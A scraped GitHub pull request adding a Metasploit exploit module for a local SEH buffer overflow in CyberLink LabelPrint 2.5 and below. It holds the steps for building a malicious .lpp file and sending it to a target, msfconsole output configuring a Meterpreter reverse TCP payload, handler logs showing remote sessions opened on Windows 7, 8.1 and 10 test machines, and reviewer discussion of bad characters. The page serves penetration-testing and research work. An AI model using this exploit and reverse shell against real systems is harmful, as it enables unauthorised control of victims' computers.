Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) by modpr0be · Pull Request #11040 · rapid7/metasploit-framework

modpr0be · 2018-11-29T14:19:44Z

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) module based on EDB-42777.

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and take over the application. This module has been tested on Windows 7x64

Homepage: http://www.cyberlink.com/
Source (CyberLink LabelPrint is part of CyberLink Power2Go. This link below will download CyberLink Power2Go first):
- https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html (downloader, it will download the main application after you run this)
Tested on: Windows 7 x64

Verification

Run the downloader/installer (It will download the installer and install the CyberLink Power2Go, LabelPrint, and WaveEditor)
Run msfconsole and the exploit module prepare for handler
Send the file to the target machine
Open CyberLink LabelPrint, go to Open -> Choose the msf.lpp -> shell/calc.

Generate msf.lpp example and handler output (tested on Windows 7 x64)

[*] Processing labelprint.rc for ERB directives.
resource (labelprint.rc)> use exploits/windows/fileformat/cyberlink_lpp_bof.rb
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /root/.msf4/local/msf.lpp
resource (labelprint.rc)> use exploits/multi/handler
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Started reverse TCP handler on 192.168.240.129:4444 
[*] Sending stage (179779 bytes) to 192.168.240.131
[*] Meterpreter session 1 opened (192.168.240.129:4444 -> 192.168.240.131:49598) at 2018-11-29 08:17:23 -0500

meterpreter >

NOTE: I used a dirty technique to reach the shellcode and it works. For now, it specifically works on Windows 7x64. I managed to make it works on Windows 10 as well, but I need to change some padding characters to reach the shellcode.

If you guys know shortest path, it would be an honor to learn from it.

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

bcoles · 2018-12-01T14:35:15Z

+      'Payload'         =>
+        {
+          'Space'       => 15000,
+          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.


starts from 80 until the rest of it

Does this mean \x80 to \xff , or \x50 to \xff , or something else?

it's \x80 to \xff

Ok, you can do something like this:

Suggested change

'BadChars' => "\x00", #badchars starts from 80 until the rest of it.

'BadChars' => "\x00" + (0x80..0xff).to_a.pack('C*')

2.3.0 :001 > (0x80..0xff).to_a.pack('C*') + "\x00" => "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF\x00"

Thanks for the suggestion! I'm looking for a replacement like that :+1

Apparently, if I put all the badchars using your suggested method, it will break how the encoder encode the payload. It will always return [-] Exploit failed: No encoders encoded the buffer successfully. So for testing, I'll stick to 'BadChars' => "\x00",

If that's the case, then not all the characters from \x80 to \xff are bad characters. You'll need to identify which characters are bad.

I already trial error all characters and found that all characters from \x80 to \xff identified as bad characters. The application won't load the crafted .lpp file if the file contains those bad characters.

modpr0be · 2018-12-03T03:37:28Z

I'm still doing some works on Windows 8.1 and Windows 10, see if I can manage to make it simpler.

modpr0be · 2018-12-04T15:15:19Z

I'm still doing some works on Windows 8.1 and Windows 10, see if I can manage to make it simpler.

I will merge all suggestions on the next commit. Still trying on Windows 8.1 and Windows 10.

Update includes all suggestions and new targets (Win8.1 x64 and Win10 x64)

jrobles-r7 · 2018-12-11T14:06:38Z

Tested on Win10 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Tested on Win8.1 x64 running CyberLink LabelPrint v2.5

msf5 exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 172.22.222.135
[*] Meterpreter session 14 opened (172.22.222.132:4444 -> 172.22.222.135:49500) at 2018-12-11 07:46:56 -0600

msf5 exploit(multi/handler) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > sysinfo
Computer        : IE11WIN8_1
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >

Tested on Win7 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.134
[*] Meterpreter session 2 opened (172.22.222.132:4444 -> 172.22.222.134:49404) at 2018-12-11 07:23:25 -0600

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : IEWIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

jrobles-r7 · 2018-12-11T14:40:35Z

Release Notes

The CyberLink LabelPrint Local BOF module has been added to the framework. This exploits a buffer overflow vulnerability in CyberLink LabelPrint 2.5 and below when the application opens a .lpp project file containing overly long string characters.

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

a4c3b8e

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

bcoles added module needs-docs labels Nov 29, 2018

jrobles-r7 self-assigned this Nov 30, 2018

bcoles reviewed Dec 1, 2018

View reviewed changes

bcoles reviewed Dec 2, 2018

View reviewed changes

Comment thread modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb Outdated

bcoles reviewed Dec 2, 2018

View reviewed changes

Comment thread modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb Outdated

modpr0be and others added 3 commits December 5, 2018 14:53

Update cyberlink_lpp_bof.rb

1bc024e

Update includes all suggestions and new targets (Win8.1 x64 and Win10 x64)

Fix syntax, minor edits

165f082

Add documentation

106d6ce

jrobles-r7 merged commit 106d6ce into rapid7:master Dec 11, 2018

jrobles-r7 added a commit that referenced this pull request Dec 11, 2018

Land #11040, Add CyberLink LabelPrint Local BOF

1ab69c2

msjenkins-r7 pushed a commit that referenced this pull request Dec 11, 2018

Land #11040, Add CyberLink LabelPrint Local BOF

562ddb8

jrobles-r7 added docs and removed needs-docs labels Dec 11, 2018

gdavidson-r7 added the rn-exploit label Dec 18, 2018

modpr0be deleted the cyberlink-lpp branch April 21, 2019 16:28

	'BadChars' => "\x00", #badchars starts from 80 until the rest of it.
	'BadChars' => "\x00" + (0x80..0xff).to_a.pack('C*')

Conversation

modpr0be commented Nov 29, 2018 • edited by jrobles-r7 Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Verification

Generate msf.lpp example and handler output (tested on Windows 7 x64)

Uh oh!

Uh oh!

Uh oh!

bcoles Dec 1, 2018

Choose a reason for hiding this comment

Uh oh!

modpr0be Dec 2, 2018

Choose a reason for hiding this comment

Uh oh!

bcoles Dec 2, 2018

Choose a reason for hiding this comment

Uh oh!

modpr0be Dec 2, 2018

Choose a reason for hiding this comment

Uh oh!

modpr0be Dec 4, 2018

Choose a reason for hiding this comment

Uh oh!

bcoles Dec 5, 2018

Choose a reason for hiding this comment

Uh oh!

modpr0be Dec 5, 2018

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

modpr0be commented Dec 3, 2018

Uh oh!

modpr0be commented Dec 4, 2018

Uh oh!

jrobles-r7 commented Dec 11, 2018

Tested on Win10 x64 running CyberLink LabelPrint v2.5

Tested on Win8.1 x64 running CyberLink LabelPrint v2.5

Tested on Win7 x64 running CyberLink LabelPrint v2.5

Uh oh!

jrobles-r7 commented Dec 11, 2018 • edited by gdavidson-r7 Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Release Notes

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

4 participants

modpr0be commented Nov 29, 2018 •

edited by jrobles-r7

Loading

jrobles-r7 commented Dec 11, 2018 •

edited by gdavidson-r7

Loading